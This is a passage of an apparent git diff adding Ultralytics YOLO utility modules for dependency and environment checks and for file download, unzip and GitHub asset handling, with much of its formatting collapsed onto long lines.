    contains `font`, then a download from the Ultralytics assets release.

    Args:
        font (str): Path or name of font.

    Returns:
        (Path | str | None): Path of the font in USER_CONFIG_DIR (existing or freshly downloaded), the path string
            of a matching system font, or None when the font is neither found nor downloadable.
    """
    from matplotlib import font_manager

    # 1. User configuration directory
    font_name = Path(font).name
    target = USER_CONFIG_DIR / font_name
    if target.exists():
        return target

    # 2. System fonts: take the first path containing the requested font
    system_font = next((path for path in font_manager.findSystemFonts() if font in path), None)
    if system_font:
        return system_font

    # 3. Download to USER_CONFIG_DIR if the asset URL is reachable
    url = f"https://github.com/ultralytics/assets/releases/download/v0.0.0/{font_name}"
    if downloads.is_url(url, check=True):
        downloads.safe_download(url=url, file=target)
        return target
@TryExcept()
def check_requirements(requirements=ROOT.parent / "requirements.txt", exclude=(), install=True, cmds=""):
    """
    Check that required packages are installed in suitable versions and optionally try to install missing ones.

    Args:
        requirements (Union[Path, str, List[str]]): Path to a requirements.txt file, a single package requirement as a
            string, or a list of package requirements as strings.
        exclude (Tuple[str]): Package names to skip when `requirements` is a requirements.txt path.
        install (bool): If True (and the AUTOINSTALL setting is enabled), attempt to pip-install unmet requirements.
        cmds (str): Additional arguments appended to the pip install command.

    Returns:
        (bool): True if every requirement is met or the automatic install succeeded, False if requirements are unmet
            and installation is disabled or failed.

    Example:
        ```python
        from ultralytics.utils.checks import check_requirements

        # Check a requirements.txt file
        check_requirements("path/to/requirements.txt")

        # Check a single package
        check_requirements("ultralytics>=8.0.0")

        # Check multiple packages
        check_requirements(["numpy", "ultralytics>=8.0.0"])
        ```
    """
    prefix = colorstr("red", "bold", "requirements:")
    if isinstance(requirements, Path):  # requirements.txt file
        file = requirements.resolve()
        assert file.exists(), f"{prefix} {file} not found, check failed."
        requirements = [f"{x.name}{x.specifier}" for x in parse_requirements(file) if x.name not in exclude]
    elif isinstance(requirements, str):
        requirements = [requirements]

    # Collect every requirement that is missing or installed in an unsuitable version
    pkgs = []
    for r in requirements:
        r_stripped = r.split("/")[-1].replace(".git", "")  # replace git+https://org/repo.git -> 'repo'
        match = re.match(r"([a-zA-Z0-9-_]+)([<>!=~]+.*)?", r_stripped)
        name, required = match[1], match[2].strip() if match[2] else ""
        try:
            satisfied = check_version(metadata.version(name), required)
        except (AssertionError, metadata.PackageNotFoundError):
            satisfied = False  # package is not installed
        if not satisfied:
            pkgs.append(r)

    @Retry(times=2, delay=1)
    def attempt_install(packages, commands):
        """Attempt pip install command with retries on failure."""
        return subprocess.check_output(f"pip install --no-cache-dir {packages} {commands}", shell=True).decode()

    s = " ".join(f'"{x}"' for x in pkgs)  # console string
    if not s:
        return True  # nothing to install
    if not (install and AUTOINSTALL):  # check environment variable
        return False

    n = len(pkgs)  # number of packages updates
    LOGGER.info(f"{prefix} Ultralytics requirement{'s' * (n > 1)} {pkgs} not found, attempting AutoUpdate...")
    try:
        t = time.time()
        assert ONLINE, "AutoUpdate skipped (offline)"
        LOGGER.info(attempt_install(s, cmds))
        dt = time.time() - t
        LOGGER.info(
            f"{prefix} AutoUpdate success ✅ {dt:.1f}s, installed {n} package{'s' * (n > 1)}: {pkgs}\n"
            f"{prefix} ⚠️ {colorstr('bold', 'Restart runtime or rerun command for updates to take effect')}\n"
        )
    except Exception as e:
        LOGGER.warning(f"{prefix} ❌ {e}")
        return False

    return True
+ + The compatibility table is a dictionary where the keys are PyTorch versions and the values are lists of compatible + Torchvision versions. + """ + # Compatibility table + compatibility_table = { + "2.4": ["0.19"], + "2.3": ["0.18"], + "2.2": ["0.17"], + "2.1": ["0.16"], + "2.0": ["0.15"], + "1.13": ["0.14"], + "1.12": ["0.13"], + } + + # Extract only the major and minor versions + v_torch = ".".join(torch.__version__.split("+")[0].split(".")[:2]) + if v_torch in compatibility_table: + compatible_versions = compatibility_table[v_torch] + v_torchvision = ".".join(TORCHVISION_VERSION.split("+")[0].split(".")[:2]) + if all(v_torchvision != v for v in compatible_versions): + print( + f"WARNING ⚠️ torchvision=={v_torchvision} is incompatible with torch=={v_torch}.\n" + f"Run 'pip install torchvision=={compatible_versions[0]}' to fix torchvision or " + "'pip install -U torch torchvision' to update both.\n" + "For a full compatibility table see https://github.com/pytorch/vision#installation" + ) + + +def check_suffix(file="yolo11n.pt", suffix=".pt", msg=""): + """Check file(s) for acceptable suffix.""" + if file and suffix: + if isinstance(suffix, str): + suffix = (suffix,) + for f in file if isinstance(file, (list, tuple)) else [file]: + s = Path(f).suffix.lower().strip() # file suffix + if len(s): + assert s in suffix, f"{msg}{f} acceptable suffix is {suffix}, not {s}" + + +def check_yolov5u_filename(file: str, verbose: bool = True): + """Replace legacy YOLOv5 filenames with updated YOLOv5u filenames.""" + if "yolov3" in file or "yolov5" in file: + if "u.yaml" in file: + file = file.replace("u.yaml", ".yaml") # i.e. yolov5nu.yaml -> yolov5n.yaml + elif ".pt" in file and "u" not in file: + original_file = file + file = re.sub(r"(.*yolov5([nsmlx]))\.pt", "\\1u.pt", file) # i.e. yolov5n.pt -> yolov5nu.pt + file = re.sub(r"(.*yolov5([nsmlx])6)\.pt", "\\1u.pt", file) # i.e. yolov5n6.pt -> yolov5n6u.pt + file = re.sub(r"(.*yolov3(|-tiny|-spp))\.pt", "\\1u.pt", file) # i.e. 
yolov3-spp.pt -> yolov3-sppu.pt + if file != original_file and verbose: + LOGGER.info( + f"PRO TIP 💡 Replace 'model={original_file}' with new 'model={file}'.\nYOLOv5 'u' models are " + f"trained with https://github.com/ultralytics/ultralytics and feature improved performance vs " + f"standard YOLOv5 models trained with https://github.com/ultralytics/yolov5.\n" + ) + return file + + +def check_model_file_from_stem(model="yolov8n"): + """Return a model filename from a valid model stem.""" + if model and not Path(model).suffix and Path(model).stem in downloads.GITHUB_ASSETS_STEMS: + return Path(model).with_suffix(".pt") # add suffix, i.e. yolov8n -> yolov8n.pt + else: + return model + + +def check_file(file, suffix="", download=True, download_dir=".", hard=True): + """Search/download file (if necessary) and return path.""" + check_suffix(file, suffix) # optional + file = str(file).strip() # convert to string and strip spaces + file = check_yolov5u_filename(file) # yolov5n -> yolov5nu + if ( + not file + or ("://" not in file and Path(file).exists()) # '://' check required in Windows Python<3.10 + or file.lower().startswith("grpc://") + ): # file exists or gRPC Triton images + return file + elif download and file.lower().startswith(("https://", "http://", "rtsp://", "rtmp://", "tcp://")): # download + url = file # warning: Pathlib turns :// -> :/ + file = Path(download_dir) / url2file(file) # '%2F' to '/', split https://url.com/file.txt?auth + if file.exists(): + LOGGER.info(f"Found {clean_url(url)} locally at {file}") # file already exists + else: + downloads.safe_download(url=url, file=file, unzip=False) + return str(file) + else: # search + files = glob.glob(str(ROOT / "**" / file), recursive=True) or glob.glob(str(ROOT.parent / file)) # find file + if not files and hard: + raise FileNotFoundError(f"'{file}' does not exist") + elif len(files) > 1 and hard: + raise FileNotFoundError(f"Multiple files match '{file}', specify exact path: {files}") + return files[0] if 
len(files) else [] # return file + + +def check_yaml(file, suffix=(".yaml", ".yml"), hard=True): + """Search/download YAML file (if necessary) and return path, checking suffix.""" + return check_file(file, suffix, hard=hard) + + +def check_is_path_safe(basedir, path): + """ + Check if the resolved path is under the intended directory to prevent path traversal. + + Args: + basedir (Path | str): The intended directory. + path (Path | str): The path to check. + + Returns: + (bool): True if the path is safe, False otherwise. + """ + base_dir_resolved = Path(basedir).resolve() + path_resolved = Path(path).resolve() + + return path_resolved.exists() and path_resolved.parts[: len(base_dir_resolved.parts)] == base_dir_resolved.parts + + +def check_imshow(warn=False): + """Check if environment supports image displays.""" + try: + if LINUX: + assert not IS_COLAB and not IS_KAGGLE + assert "DISPLAY" in os.environ, "The DISPLAY environment variable isn't set." + cv2.imshow("test", np.zeros((8, 8, 3), dtype=np.uint8)) # show a small 8-pixel image + cv2.waitKey(1) + cv2.destroyAllWindows() + cv2.waitKey(1) + return True + except Exception as e: + if warn: + LOGGER.warning(f"WARNING ⚠️ Environment does not support cv2.imshow() or PIL Image.show()\n{e}") + return False + + +def check_yolo(verbose=True, device=""): + """Return a human-readable YOLO software and hardware summary.""" + import psutil + + from ultralytics.utils.torch_utils import select_device + + if IS_COLAB: + shutil.rmtree("sample_data", ignore_errors=True) # remove colab /sample_data directory + + if verbose: + # System info + gib = 1 << 30 # bytes per GiB + ram = psutil.virtual_memory().total + total, used, free = shutil.disk_usage("/") + s = f"({os.cpu_count()} CPUs, {ram / gib:.1f} GB RAM, {(total - free) / gib:.1f}/{total / gib:.1f} GB disk)" + try: + from IPython import display + + display.clear_output() # clear display if notebook + except ImportError: + pass + else: + s = "" + + select_device(device=device, 
newline=False) + LOGGER.info(f"Setup complete ✅ {s}") + + +def collect_system_info(): + """Collect and print relevant system information including OS, Python, RAM, CPU, and CUDA.""" + import psutil + + from ultralytics.utils import ENVIRONMENT # scope to avoid circular import + from ultralytics.utils.torch_utils import get_cpu_info, get_gpu_info + + gib = 1 << 30 # bytes per GiB + cuda = torch and torch.cuda.is_available() + check_yolo() + total, used, free = shutil.disk_usage("/") + + info_dict = { + "OS": platform.platform(), + "Environment": ENVIRONMENT, + "Python": PYTHON_VERSION, + "Install": "git" if IS_GIT_DIR else "pip" if IS_PIP_PACKAGE else "other", + "RAM": f"{psutil.virtual_memory().total / gib:.2f} GB", + "Disk": f"{(total - free) / gib:.1f}/{total / gib:.1f} GB", + "CPU": get_cpu_info(), + "CPU count": os.cpu_count(), + "GPU": get_gpu_info(index=0) if cuda else None, + "GPU count": torch.cuda.device_count() if cuda else None, + "CUDA": torch.version.cuda if cuda else None, + } + LOGGER.info("\n" + "\n".join(f"{k:<20}{v}" for k, v in info_dict.items()) + "\n") + + package_info = {} + for r in parse_requirements(package="ultralytics"): + try: + current = metadata.version(r.name) + is_met = "✅ " if check_version(current, str(r.specifier), name=r.name, hard=True) else "❌ " + except metadata.PackageNotFoundError: + current = "(not installed)" + is_met = "❌ " + package_info[r.name] = f"{is_met}{current}{r.specifier}" + LOGGER.info(f"{r.name:<20}{package_info[r.name]}") + + info_dict["Package Info"] = package_info + + if is_github_action_running(): + github_info = { + "RUNNER_OS": os.getenv("RUNNER_OS"), + "GITHUB_EVENT_NAME": os.getenv("GITHUB_EVENT_NAME"), + "GITHUB_WORKFLOW": os.getenv("GITHUB_WORKFLOW"), + "GITHUB_ACTOR": os.getenv("GITHUB_ACTOR"), + "GITHUB_REPOSITORY": os.getenv("GITHUB_REPOSITORY"), + "GITHUB_REPOSITORY_OWNER": os.getenv("GITHUB_REPOSITORY_OWNER"), + } + LOGGER.info("\n" + "\n".join(f"{k}: {v}" for k, v in github_info.items())) + 
info_dict["GitHub Info"] = github_info + + return info_dict + + +def check_amp(model): + """ + Checks the PyTorch Automatic Mixed Precision (AMP) functionality of a YOLO11 model. If the checks fail, it means + there are anomalies with AMP on the system that may cause NaN losses or zero-mAP results, so AMP will be disabled + during training. + + Args: + model (nn.Module): A YOLO11 model instance. + + Example: + ```python + from ultralytics import YOLO + from ultralytics.utils.checks import check_amp + + model = YOLO("yolo11n.pt").model.cuda() + check_amp(model) + ``` + + Returns: + (bool): Returns True if the AMP functionality works correctly with YOLO11 model, else False. + """ + from ultralytics.utils.torch_utils import autocast + + device = next(model.parameters()).device # get model device + if device.type in {"cpu", "mps"}: + return False # AMP only used on CUDA devices + + def amp_allclose(m, im): + """All close FP32 vs AMP results.""" + batch = [im] * 8 + imgsz = max(256, int(model.stride.max() * 4)) # max stride P5-32 and P6-64 + a = m(batch, imgsz=imgsz, device=device, verbose=False)[0].boxes.data # FP32 inference + with autocast(enabled=True): + b = m(batch, imgsz=imgsz, device=device, verbose=False)[0].boxes.data # AMP inference + del m + return a.shape == b.shape and torch.allclose(a, b.float(), atol=0.5) # close to 0.5 absolute tolerance + + im = ASSETS / "bus.jpg" # image to check + prefix = colorstr("AMP: ") + LOGGER.info(f"{prefix}running Automatic Mixed Precision (AMP) checks...") + warning_msg = "Setting 'amp=True'. If you experience zero-mAP or NaN losses you can disable AMP with amp=False." + try: + from ultralytics import YOLO + + assert amp_allclose(YOLO("yolo11n.pt"), im) + LOGGER.info(f"{prefix}checks passed ✅") + except ConnectionError: + LOGGER.warning( + f"{prefix}checks skipped ⚠️. " f"Offline and unable to download YOLO11n for AMP checks. 
{warning_msg}" + ) + except (AttributeError, ModuleNotFoundError): + LOGGER.warning( + f"{prefix}checks skipped ⚠️. " + f"Unable to load YOLO11n for AMP checks due to possible Ultralytics package modifications. {warning_msg}" + ) + except AssertionError: + LOGGER.warning( + f"{prefix}checks failed ❌. Anomalies were detected with AMP on your system that may lead to " + f"NaN losses or zero-mAP results, so AMP will be disabled during training." + ) + return False + return True + + +def git_describe(path=ROOT): # path must be a directory + """Return human-readable git description, i.e. v5.0-5-g3e25f1e https://git-scm.com/docs/git-describe.""" + try: + return subprocess.check_output(f"git -C {path} describe --tags --long --always", shell=True).decode()[:-1] + except Exception: + return "" + + +def print_args(args: Optional[dict] = None, show_file=True, show_func=False): + """Print function arguments (optional args dict).""" + + def strip_auth(v): + """Clean longer Ultralytics HUB URLs by stripping potential authentication information.""" + return clean_url(v) if (isinstance(v, str) and v.startswith("http") and len(v) > 100) else v + + x = inspect.currentframe().f_back # previous frame + file, _, func, _, _ = inspect.getframeinfo(x) + if args is None: # get args automatically + args, _, _, frm = inspect.getargvalues(x) + args = {k: v for k, v in frm.items() if k in args} + try: + file = Path(file).resolve().relative_to(ROOT).with_suffix("") + except ValueError: + file = Path(file).stem + s = (f"{file}: " if show_file else "") + (f"{func}: " if show_func else "") + LOGGER.info(colorstr(s) + ", ".join(f"{k}={strip_auth(v)}" for k, v in args.items())) + + +def cuda_device_count() -> int: + """ + Get the number of NVIDIA GPUs available in the environment. + + Returns: + (int): The number of NVIDIA GPUs available. 
+ """ + try: + # Run the nvidia-smi command and capture its output + output = subprocess.check_output( + ["nvidia-smi", "--query-gpu=count", "--format=csv,noheader,nounits"], encoding="utf-8" + ) + + # Take the first line and strip any leading/trailing white space + first_line = output.strip().split("\n")[0] + + return int(first_line) + except (subprocess.CalledProcessError, FileNotFoundError, ValueError): + # If the command fails, nvidia-smi is not found, or output is not an integer, assume no GPUs are available + return 0 + + +def cuda_is_available() -> bool: + """ + Check if CUDA is available in the environment. + + Returns: + (bool): True if one or more NVIDIA GPUs are available, False otherwise. + """ + return cuda_device_count() > 0 + + +# Run checks and define constants +check_python("3.8", hard=False, verbose=True) # check python version +check_torchvision() # check torch-torchvision compatibility +IS_PYTHON_MINIMUM_3_10 = check_python("3.10", hard=False) +IS_PYTHON_3_12 = PYTHON_VERSION.startswith("3.12") diff --git a/2024.ultralytics/v8.3.40/utils/downloads.py b/2024.ultralytics/v8.3.40/utils/downloads.py new file mode 100644 index 0000000..be182f4 --- /dev/null +++ b/2024.ultralytics/v8.3.40/utils/downloads.py @@ -0,0 +1,507 @@ +# Ultralytics YOLO 🚀, AGPL-3.0 license + +import re +import shutil +import subprocess +from itertools import repeat +from multiprocessing.pool import ThreadPool +from pathlib import Path +from urllib import parse, request + +import requests +import torch + +from ultralytics.utils import LOGGER, TQDM, checks, clean_url, emojis, is_online, url2file + +# Define Ultralytics GitHub assets maintained at https://github.com/ultralytics/assets +GITHUB_ASSETS_REPO = "ultralytics/assets" +GITHUB_ASSETS_NAMES = ( + [f"yolov8{k}{suffix}.pt" for k in "nsmlx" for suffix in ("", "-cls", "-seg", "-pose", "-obb", "-oiv7")] + + [f"yolo11{k}{suffix}.pt" for k in "nsmlx" for suffix in ("", "-cls", "-seg", "-pose", "-obb")] + + 
[f"yolov5{k}{resolution}u.pt" for k in "nsmlx" for resolution in ("", "6")] + + [f"yolov3{k}u.pt" for k in ("", "-spp", "-tiny")] + + [f"yolov8{k}-world.pt" for k in "smlx"] + + [f"yolov8{k}-worldv2.pt" for k in "smlx"] + + [f"yolov9{k}.pt" for k in "tsmce"] + + [f"yolov10{k}.pt" for k in "nsmblx"] + + [f"yolo_nas_{k}.pt" for k in "sml"] + + [f"sam_{k}.pt" for k in "bl"] + + [f"FastSAM-{k}.pt" for k in "sx"] + + [f"rtdetr-{k}.pt" for k in "lx"] + + ["mobile_sam.pt"] + + ["calibration_image_sample_data_20x128x128x3_float32.npy.zip"] +) +GITHUB_ASSETS_STEMS = [Path(k).stem for k in GITHUB_ASSETS_NAMES] + + +def is_url(url, check=False): + """ + Validates if the given string is a URL and optionally checks if the URL exists online. + + Args: + url (str): The string to be validated as a URL. + check (bool, optional): If True, performs an additional check to see if the URL exists online. + Defaults to False. + + Returns: + (bool): Returns True for a valid URL. If 'check' is True, also returns True if the URL exists online. + Returns False otherwise. + + Example: + ```python + valid = is_url("https://www.example.com") + ``` + """ + try: + url = str(url) + result = parse.urlparse(url) + assert all([result.scheme, result.netloc]) # check if is url + if check: + with request.urlopen(url) as response: + return response.getcode() == 200 # check if exists online + return True + except Exception: + return False + + +def delete_dsstore(path, files_to_delete=(".DS_Store", "__MACOSX")): + """ + Deletes all ".DS_store" files under a specified directory. + + Args: + path (str, optional): The directory path where the ".DS_store" files should be deleted. + files_to_delete (tuple): The files to be deleted. + + Example: + ```python + from ultralytics.utils.downloads import delete_dsstore + + delete_dsstore("path/to/dir") + ``` + + Note: + ".DS_store" files are created by the Apple operating system and contain metadata about folders and files. 
They + are hidden system files and can cause issues when transferring files between different operating systems. + """ + for file in files_to_delete: + matches = list(Path(path).rglob(file)) + LOGGER.info(f"Deleting {file} files: {matches}") + for f in matches: + f.unlink() + + +def zip_directory(directory, compress=True, exclude=(".DS_Store", "__MACOSX"), progress=True): + """ + Zips the contents of a directory, excluding files containing strings in the exclude list. The resulting zip file is + named after the directory and placed alongside it. + + Args: + directory (str | Path): The path to the directory to be zipped. + compress (bool): Whether to compress the files while zipping. Default is True. + exclude (tuple, optional): A tuple of filename strings to be excluded. Defaults to ('.DS_Store', '__MACOSX'). + progress (bool, optional): Whether to display a progress bar. Defaults to True. + + Returns: + (Path): The path to the resulting zip file. + + Example: + ```python + from ultralytics.utils.downloads import zip_directory + + file = zip_directory("path/to/dir") + ``` + """ + from zipfile import ZIP_DEFLATED, ZIP_STORED, ZipFile + + delete_dsstore(directory) + directory = Path(directory) + if not directory.is_dir(): + raise FileNotFoundError(f"Directory '{directory}' does not exist.") + + # Unzip with progress bar + files_to_zip = [f for f in directory.rglob("*") if f.is_file() and all(x not in f.name for x in exclude)] + zip_file = directory.with_suffix(".zip") + compression = ZIP_DEFLATED if compress else ZIP_STORED + with ZipFile(zip_file, "w", compression) as f: + for file in TQDM(files_to_zip, desc=f"Zipping {directory} to {zip_file}...", unit="file", disable=not progress): + f.write(file, file.relative_to(directory)) + + return zip_file # return path to zip file + + +def unzip_file(file, path=None, exclude=(".DS_Store", "__MACOSX"), exist_ok=False, progress=True): + """ + Unzips a *.zip file to the specified path, excluding files containing strings in the 
exclude list. + + If the zipfile does not contain a single top-level directory, the function will create a new + directory with the same name as the zipfile (without the extension) to extract its contents. + If a path is not provided, the function will use the parent directory of the zipfile as the default path. + + Args: + file (str): The path to the zipfile to be extracted. + path (str, optional): The path to extract the zipfile to. Defaults to None. + exclude (tuple, optional): A tuple of filename strings to be excluded. Defaults to ('.DS_Store', '__MACOSX'). + exist_ok (bool, optional): Whether to overwrite existing contents if they exist. Defaults to False. + progress (bool, optional): Whether to display a progress bar. Defaults to True. + + Raises: + BadZipFile: If the provided file does not exist or is not a valid zipfile. + + Returns: + (Path): The path to the directory where the zipfile was extracted. + + Example: + ```python + from ultralytics.utils.downloads import unzip_file + + dir = unzip_file("path/to/file.zip") + ``` + """ + from zipfile import BadZipFile, ZipFile, is_zipfile + + if not (Path(file).exists() and is_zipfile(file)): + raise BadZipFile(f"File '{file}' does not exist or is a bad zip file.") + if path is None: + path = Path(file).parent # default path + + # Unzip the file contents + with ZipFile(file) as zipObj: + files = [f for f in zipObj.namelist() if all(x not in f for x in exclude)] + top_level_dirs = {Path(f).parts[0] for f in files} + + # Decide to unzip directly or unzip into a directory + unzip_as_dir = len(top_level_dirs) == 1 # (len(files) > 1 and not files[0].endswith("/")) + if unzip_as_dir: + # Zip has 1 top-level directory + extract_path = path # i.e. ../datasets + path = Path(path) / list(top_level_dirs)[0] # i.e. extract coco8/ dir to ../datasets/ + else: + # Zip has multiple files at top level + path = extract_path = Path(path) / Path(file).stem # i.e. 
extract multiple files to ../datasets/coco8/ + + # Check if destination directory already exists and contains files + if path.exists() and any(path.iterdir()) and not exist_ok: + # If it exists and is not empty, return the path without unzipping + LOGGER.warning(f"WARNING ⚠️ Skipping {file} unzip as destination directory {path} is not empty.") + return path + + for f in TQDM(files, desc=f"Unzipping {file} to {Path(path).resolve()}...", unit="file", disable=not progress): + # Ensure the file is within the extract_path to avoid path traversal security vulnerability + if ".." in Path(f).parts: + LOGGER.warning(f"Potentially insecure file path: {f}, skipping extraction.") + continue + zipObj.extract(f, extract_path) + + return path # return unzip dir + + +def check_disk_space(url="https://ultralytics.com/assets/coco8.zip", path=Path.cwd(), sf=1.5, hard=True): + """ + Check if there is sufficient disk space to download and store a file. + + Args: + url (str, optional): The URL to the file. Defaults to 'https://ultralytics.com/assets/coco8.zip'. + path (str | Path, optional): The path or drive to check the available free space on. + sf (float, optional): Safety factor, the multiplier for the required free space. Defaults to 1.5. + hard (bool, optional): Whether to throw an error or not on insufficient disk space. Defaults to True. + + Returns: + (bool): True if there is sufficient disk space, False otherwise. 
+ """ + try: + r = requests.head(url) # response + assert r.status_code < 400, f"URL error for {url}: {r.status_code} {r.reason}" # check response + except Exception: + return True # requests issue, default to True + + # Check file size + gib = 1 << 30 # bytes per GiB + data = int(r.headers.get("Content-Length", 0)) / gib # file size (GB) + total, used, free = (x / gib for x in shutil.disk_usage(path)) # bytes + + if data * sf < free: + return True # sufficient space + + # Insufficient space + text = ( + f"WARNING ⚠️ Insufficient free disk space {free:.1f} GB < {data * sf:.3f} GB required, " + f"Please free {data * sf - free:.1f} GB additional disk space and try again." + ) + if hard: + raise MemoryError(text) + LOGGER.warning(text) + return False + + +def get_google_drive_file_info(link): + """ + Retrieves the direct download link and filename for a shareable Google Drive file link. + + Args: + link (str): The shareable link of the Google Drive file. + + Returns: + (str): Direct download URL for the Google Drive file. + (str): Original filename of the Google Drive file. If filename extraction fails, returns None. + + Example: + ```python + from ultralytics.utils.downloads import get_google_drive_file_info + + link = "https://drive.google.com/file/d/1cqT-cJgANNrhIHCrEufUYhQ4RqiWG_lJ/view?usp=drive_link" + url, filename = get_google_drive_file_info(link) + ``` + """ + file_id = link.split("/d/")[1].split("/view")[0] + drive_url = f"https://drive.google.com/uc?export=download&id={file_id}" + filename = None + + # Start session + with requests.Session() as session: + response = session.get(drive_url, stream=True) + if "quota exceeded" in str(response.content.lower()): + raise ConnectionError( + emojis( + f"❌ Google Drive file download quota exceeded. " + f"Please try again later or download this file manually at {link}." 
+ ) + ) + for k, v in response.cookies.items(): + if k.startswith("download_warning"): + drive_url += f"&confirm={v}" # v is token + cd = response.headers.get("content-disposition") + if cd: + filename = re.findall('filename="(.+)"', cd)[0] + return drive_url, filename + + +def safe_download( + url, + file=None, + dir=None, + unzip=True, + delete=False, + curl=False, + retry=3, + min_bytes=1e0, + exist_ok=False, + progress=True, +): + """ + Downloads files from a URL, with options for retrying, unzipping, and deleting the downloaded file. + + Args: + url (str): The URL of the file to be downloaded. + file (str, optional): The filename of the downloaded file. + If not provided, the file will be saved with the same name as the URL. + dir (str, optional): The directory to save the downloaded file. + If not provided, the file will be saved in the current working directory. + unzip (bool, optional): Whether to unzip the downloaded file. Default: True. + delete (bool, optional): Whether to delete the downloaded file after unzipping. Default: False. + curl (bool, optional): Whether to use curl command line tool for downloading. Default: False. + retry (int, optional): The number of times to retry the download in case of failure. Default: 3. + min_bytes (float, optional): The minimum number of bytes that the downloaded file should have, to be considered + a successful download. Default: 1E0. + exist_ok (bool, optional): Whether to overwrite existing contents during unzipping. Defaults to False. + progress (bool, optional): Whether to display a progress bar during the download. Default: True. 
+ + Example: + ```python + from ultralytics.utils.downloads import safe_download + + link = "https://ultralytics.com/assets/bus.jpg" + path = safe_download(link) + ``` + """ + gdrive = url.startswith("https://drive.google.com/") # check if the URL is a Google Drive link + if gdrive: + url, file = get_google_drive_file_info(url) + + f = Path(dir or ".") / (file or url2file(url)) # URL converted to filename + if "://" not in str(url) and Path(url).is_file(): # URL exists ('://' check required in Windows Python<3.10) + f = Path(url) # filename + elif not f.is_file(): # URL and file do not exist + uri = (url if gdrive else clean_url(url)).replace( # cleaned and aliased url + "https://github.com/ultralytics/assets/releases/download/v0.0.0/", + "https://ultralytics.com/assets/", # assets alias + ) + desc = f"Downloading {uri} to '{f}'" + LOGGER.info(f"{desc}...") + f.parent.mkdir(parents=True, exist_ok=True) # make directory if missing + check_disk_space(url, path=f.parent) + for i in range(retry + 1): + try: + if curl or i > 0: # curl download with retry, continue + s = "sS" * (not progress) # silent + r = subprocess.run(["curl", "-#", f"-{s}L", url, "-o", f, "--retry", "3", "-C", "-"]).returncode + assert r == 0, f"Curl return value {r}" + else: # urllib download + method = "torch" + if method == "torch": + torch.hub.download_url_to_file(url, f, progress=progress) + else: + with request.urlopen(url) as response, TQDM( + total=int(response.getheader("Content-Length", 0)), + desc=desc, + disable=not progress, + unit="B", + unit_scale=True, + unit_divisor=1024, + ) as pbar: + with open(f, "wb") as f_opened: + for data in response: + f_opened.write(data) + pbar.update(len(data)) + + if f.exists(): + if f.stat().st_size > min_bytes: + break # success + f.unlink() # remove partial downloads + except Exception as e: + if i == 0 and not is_online(): + raise ConnectionError(emojis(f"❌ Download failure for {uri}. 
Environment is not online.")) from e + elif i >= retry: + raise ConnectionError(emojis(f"❌ Download failure for {uri}. Retry limit reached.")) from e + LOGGER.warning(f"⚠️ Download failure, retrying {i + 1}/{retry} {uri}...") + + if unzip and f.exists() and f.suffix in {"", ".zip", ".tar", ".gz"}: + from zipfile import is_zipfile + + unzip_dir = (dir or f.parent).resolve() # unzip to dir if provided else unzip in place + if is_zipfile(f): + unzip_dir = unzip_file(file=f, path=unzip_dir, exist_ok=exist_ok, progress=progress) # unzip + elif f.suffix in {".tar", ".gz"}: + LOGGER.info(f"Unzipping {f} to {unzip_dir}...") + subprocess.run(["tar", "xf" if f.suffix == ".tar" else "xfz", f, "--directory", unzip_dir], check=True) + if delete: + f.unlink() # remove zip + return unzip_dir + + +def get_github_assets(repo="ultralytics/assets", version="latest", retry=False): + """ + Retrieve the specified version's tag and assets from a GitHub repository. If the version is not specified, the + function fetches the latest release assets. + + Args: + repo (str, optional): The GitHub repository in the format 'owner/repo'. Defaults to 'ultralytics/assets'. + version (str, optional): The release version to fetch assets from. Defaults to 'latest'. + retry (bool, optional): Flag to retry the request in case of a failure. Defaults to False. + + Returns: + (tuple): A tuple containing the release tag and a list of asset names. + + Example: + ```python + tag, assets = get_github_assets(repo="ultralytics/assets", version="latest") + ``` + """ + if version != "latest": + version = f"tags/{version}" # i.e. 
tags/v6.2 + url = f"https://api.github.com/repos/{repo}/releases/{version}" + r = requests.get(url) # github api + if r.status_code != 200 and r.reason != "rate limit exceeded" and retry: # failed and not 403 rate limit exceeded + r = requests.get(url) # try again + if r.status_code != 200: + LOGGER.warning(f"⚠️ GitHub assets check failure for {url}: {r.status_code} {r.reason}") + return "", [] + data = r.json() + return data["tag_name"], [x["name"] for x in data["assets"]] # tag, assets i.e. ['yolov8n.pt', 'yolov8s.pt', ...] + + +def attempt_download_asset(file, repo="ultralytics/assets", release="v8.3.0", **kwargs): + """ + Attempt to download a file from GitHub release assets if it is not found locally. The function checks for the file + locally first, then tries to download it from the specified GitHub repository release. + + Args: + file (str | Path): The filename or file path to be downloaded. + repo (str, optional): The GitHub repository in the format 'owner/repo'. Defaults to 'ultralytics/assets'. + release (str, optional): The specific release version to be downloaded. Defaults to 'v8.3.0'. + **kwargs (any): Additional keyword arguments for the download process. + + Returns: + (str): The path to the downloaded file. + + Example: + ```python + file_path = attempt_download_asset("yolo11n.pt", repo="ultralytics/assets", release="latest") + ``` + """ + from ultralytics.utils import SETTINGS # scoped for circular import + + # YOLOv3/5u updates + file = str(file) + file = checks.check_yolov5u_filename(file) + file = Path(file.strip().replace("'", "")) + if file.exists(): + return str(file) + elif (SETTINGS["weights_dir"] / file).exists(): + return str(SETTINGS["weights_dir"] / file) + else: + # URL specified + name = Path(parse.unquote(str(file))).name # decode '%2F' to '/' etc. 
+ download_url = f"https://github.com/{repo}/releases/download" + if str(file).startswith(("http:/", "https:/")): # download + url = str(file).replace(":/", "://") # Pathlib turns :// -> :/ + file = url2file(name) # parse authentication https://url.com/file.txt?auth... + if Path(file).is_file(): + LOGGER.info(f"Found {clean_url(url)} locally at {file}") # file already exists + else: + safe_download(url=url, file=file, min_bytes=1e5, **kwargs) + + elif repo == GITHUB_ASSETS_REPO and name in GITHUB_ASSETS_NAMES: + safe_download(url=f"{download_url}/{release}/{name}", file=file, min_bytes=1e5, **kwargs) + + else: + tag, assets = get_github_assets(repo, release) + if not assets: + tag, assets = get_github_assets(repo) # latest release + if name in assets: + safe_download(url=f"{download_url}/{tag}/{name}", file=file, min_bytes=1e5, **kwargs) + + return str(file) + + +def download(url, dir=Path.cwd(), unzip=True, delete=False, curl=False, threads=1, retry=3, exist_ok=False): + """ + Downloads files from specified URLs to a given directory. Supports concurrent downloads if multiple threads are + specified. + + Args: + url (str | list): The URL or list of URLs of the files to be downloaded. + dir (Path, optional): The directory where the files will be saved. Defaults to the current working directory. + unzip (bool, optional): Flag to unzip the files after downloading. Defaults to True. + delete (bool, optional): Flag to delete the zip files after extraction. Defaults to False. + curl (bool, optional): Flag to use curl for downloading. Defaults to False. + threads (int, optional): Number of threads to use for concurrent downloads. Defaults to 1. + retry (int, optional): Number of retries in case of download failure. Defaults to 3. + exist_ok (bool, optional): Whether to overwrite existing contents during 